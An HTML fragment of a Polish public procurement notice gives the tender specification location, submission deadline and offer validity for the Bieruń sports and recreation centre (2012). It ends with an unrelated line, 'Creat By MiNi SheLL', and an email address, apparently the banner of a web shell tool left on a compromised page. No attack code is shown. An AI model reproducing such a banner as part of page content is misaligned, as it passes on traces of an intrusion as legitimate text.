<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bosir.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bieruński Ośrodek Sportu i Rekreacji - budynek Centrum Inicjatyw Gospodarczych (pokój nr 37)
43-155 Bieruń, ul. Turystyczna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.11.2012 godzina 11:00, miejsce: Bieruński Ośrodek Sportu i Rekreacji - budynek Centrum Inicjatyw Gospodarczych (pokój nr 37)
43-155 Bieruń, ul. Turystyczna 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com